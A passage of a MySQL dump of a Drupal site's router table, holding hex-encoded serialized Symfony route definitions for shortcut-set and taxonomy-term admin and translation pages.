a73686f72746375745f736574223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a2273686f72746375745f736574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38343a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6d616e6167652f283f503c73686f72746375745f7365743e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a2273686f72746375745f736574223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34343a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a2273686f72746375745f736574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35333a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f252f64656c657465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.shortcut_set.edit_form', '/admin/config/user-interface/shortcut/manage/{shortcut_set}', '/admin/config/user-interface/shortcut/manage/%', 62, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35393a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f7b73686f72746375745f7365747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31373a2273686f72746375745f7365742e65646974223b733a363a225f7469746c65223b733a31373a22456469742073686f727463757420736574223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31393a2273686f72746375745f7365742e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a2273686f72746375745f736574223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a73686f72746375745f736574223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a2273686f72746375745f736574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37373a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6d616e6167652f283f503c73686f72746375745f7365743e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a2273686f72746375745f736574223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a34343a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a2273686f72746375745f736574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36323b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f25223b733a383a226e756d5061727473223b693a363b7d7d, 6);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('entity.taxonomy_term.add_form', '/admin/structure/taxonomy/manage/{taxonomy_vocabulary}/add', '/admin/structure/taxonomy/manage/%/add', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35383a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35353a225c44727570616c5c7461786f6e6f6d795c436f6e74726f6c6c65725c5461786f6e6f6d79436f6e74726f6c6c65723a3a616464466f726d223b733a363a225f7469746c65223b733a383a22416464207465726d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32313a225f656e746974795f6372656174655f616363657373223b733a33353a227461786f6e6f6d795f7465726d3a7b7461786f6e6f6d795f766f636162756c6172797d223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b613a323a7b733a343a2274797065223b733a32363a22656e746974793a7461786f6e6f6d795f766f636162756c617279223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32363a226163636573735f636865636b2e656e746974795f637265617465223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37353a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f283f503c7461786f6e6f6d795f766f636162756c6172793e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33383a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f252f616464223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.taxonomy_term.canonical', '/taxonomy/term/{taxonomy_term}', '/taxonomy/term/%', 6, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33303a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a35373a225c44727570616c5c7461786f6e6f6d795c436f6e74726f6c6c65725c5461786f6e6f6d79436f6e74726f6c6c65723a3a7465726d5469746c65223b733a373a22766965775f6964223b733a31333a227461786f6e6f6d795f7465726d223b733a31303a22646973706c61795f6964223b733a363a22706167655f31223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31343a2261636365737320636f6e74656e74223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a393a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a313a7b733a353a226172675f30223b733a31333a227461786f6e6f6d795f7465726d223b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a227461786f6e6f6d795f7465726d223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a7461786f6e6f6d795f7465726d223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34373a227b5e2f7461786f6e6f6d792f7465726d2f283f503c7461786f6e6f6d795f7465726d3e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a227461786f6e6f6d795f7465726d223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f7461786f6e6f6d792f7465726d223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a363b733a31343a227061747465726e4f75746c696e65223b733a31363a222f7461786f6e6f6d792f7465726d2f25223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.taxonomy_term.content_translation_add', '/taxonomy/term/{taxonomy_term}/translations/add/{source}/{target}', '/taxonomy/term/%/translations/add', 27, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36353a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f7472616e736c6174696f6e732f6164642f7b736f757263657d2f7b7461726765747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a37323a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a616464223b733a363a22736f75726365223b4e3b733a363a22746172676574223b4e3b733a363a225f7469746c65223b733a333a22416464223b733a31343a22656e746974795f747970655f6964223b733a31333a227461786f6e6f6d795f7465726d223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31383a227461786f6e6f6d795f7465726d2e76696577223b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a22637265617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a333a7b733a363a22736f75726365223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a363a22746172676574223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a31333a227461786f6e6f6d795f7465726d223b613a333a7b733a343a2274797065223b733a32303a22656e746974793a7461786f6e6f6d795f7465726d223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b693a313b733a363a22736f75726365223b693a323b733a363a22746172676574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131323a227b5e2f7461786f6e6f6d792f7465726d2f283f503c7461786f6e6f6d795f7465726d3e5b5e2f5d2b2b292f7472616e736c6174696f6e732f616464283f3a2f283f503c736f757263653e5b5e2f5d2b2b29283f3a2f283f503c7461726765743e5b5e2f5d2b2b29293f293f247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22746172676574223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22736f75726365223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f7472616e736c6174696f6e732f616464223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a227461786f6e6f6d795f7465726d223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f7461786f6e6f6d792f7465726d223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b693a313b733a363a22736f75726365223b693a323b733a363a22746172676574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a32373b733a31343a227061747465726e4f75746c696e65223b733a33333a222f7461786f6e6f6d792f7465726d2f252f7472616e736c6174696f6e732f616464223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.taxonomy_term.content_translation_delete', '/taxonomy/term/{taxonomy_term}/translations/delete/{language}', '/taxonomy/term/%/translations/delete', 27, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36313a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f7472616e736c6174696f6e732f64656c6574652f7b6c616e67756167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a34323a227461786f6e6f6d795f7465726d2e636f6e74656e745f7472616e736c6174696f6e5f64656c6574696f6e223b733a383a226c616e6775616765223b4e3b733a363a225f7469746c65223b733a363a2244656c657465223b733a31343a22656e746974795f747970655f6964223b733a31333a227461786f6e6f6d795f7465726d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a2264656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a383a226c616e6775616765223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a31333a227461786f6e6f6d795f7465726d223b613a333a7b733a343a2274797065223b733a32303a22656e746974793a7461786f6e6f6d795f7465726d223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b693a313b733a383a226c616e6775616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39333a227b5e2f7461786f6e6f6d792f7465726d2f283f503c7461786f6e6f6d795f7465726d3e5b5e2f5d2b2b292f7472616e736c6174696f6e732f64656c657465283f3a2f283f503c6c616e67756167653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e6775616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f7472616e736c6174696f6e732f64656c657465223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a227461786f6e6f6d795f7465726d223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f7461786f6e6f6d792f7465726d223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b693a313b733a383a226c616e6775616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a32373b733a31343a227061747465726e4f75746c696e65223b733a33363a222f7461786f6e6f6d792f7465726d2f252f7472616e736c6174696f6e732f64656c657465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.taxonomy_term.content_translation_edit', '/taxonomy/term/{taxonomy_term}/translations/edit/{language}', '/taxonomy/term/%/translations/edit', 27, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35393a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f7472616e736c6174696f6e732f656469742f7b6c616e67756167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a37333a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a65646974223b733a383a226c616e6775616765223b4e3b733a363a225f7469746c65223b733a343a2245646974223b733a31343a22656e746974795f747970655f6964223b733a31333a227461786f6e6f6d795f7465726d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a22757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a383a226c616e6775616765223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a31333a227461786f6e6f6d795f7465726d223b613a333a7b733a343a2274797065223b733a32303a22656e746974793a7461786f6e6f6d795f7465726d223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b693a313b733a383a226c616e6775616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39313a227b5e2f7461786f6e6f6d792f7465726d2f283f503c7461786f6e6f6d795f7465726d3e5b5e2f5d2b2b292f7472616e736c6174696f6e732f65646974283f3a2f283f503c6c616e67756167653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e6775616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31383a222f7472616e736c6174696f6e732f65646974223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a227461786f6e6f6d795f7465726d223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f7461786f6e6f6d792f7465726d223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b693a313b733a383a226c616e6775616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a32373b733a31343a227061747465726e4f75746c696e65223b733a33343a222f7461786f6e6f6d792f7465726d2f252f7472616e736c6174696f6e732f65646974223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.taxonomy_term.content_translation_overview', '/taxonomy/term/{taxonomy_term}/translations', '/taxonomy/term/%/translations', 13, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34333a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f7472616e736c6174696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37373a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a6f76657276696577223b733a31343a22656e746974795f747970655f6964223b733a31333a227461786f6e6f6d795f7465726d223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31383a227461786f6e6f6d795f7465726d2e76696577223b733a33363a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6f76657276696577223b733a31333a227461786f6e6f6d795f7465726d223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31333a227461786f6e6f6d795f7465726d223b613a333a7b733a343a2274797065223b733a32303a22656e746974793a7461786f6e6f6d795f7465726d223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a33353a22636f6e74656e745f7472616e736c6174696f6e2e6f766572766965775f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36303a227b5e2f7461786f6e6f6d792f7465726d2f283f503c7461786f6e6f6d795f7465726d3e5b5e2f5d2b2b292f7472616e736c6174696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f7472616e736c6174696f6e73223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a227461786f6e6f6d795f7465726d223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f7461786f6e6f6d792f7465726d223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31333b733a31343a227061747465726e4f75746c696e65223b733a32393a222f7461786f6e6f6d792f7465726d2f252f7472616e736c6174696f6e73223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.taxonomy_term.delete_form', '/taxonomy/term/{taxonomy_term}/delete', '/taxonomy/term/%/delete', 13, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33373a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32303a227461786f6e6f6d795f7465726d2e64656c657465223b733a363a225f7469746c65223b733a31313a2244656c657465207465726d223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a32303a227461786f6e6f6d795f7465726d2e64656c657465223b733a31333a227461786f6e6f6d795f7465726d223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a227461786f6e6f6d795f7465726d223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a7461786f6e6f6d795f7465726d223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35313a227b5e2f7461786f6e6f6d792f7465726d2f283f503c7461786f6e6f6d795f7465726d3e5c642b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a31333a227461786f6e6f6d795f7465726d223b693a343b623a313b7d693a323b613a323a7b693a303b733a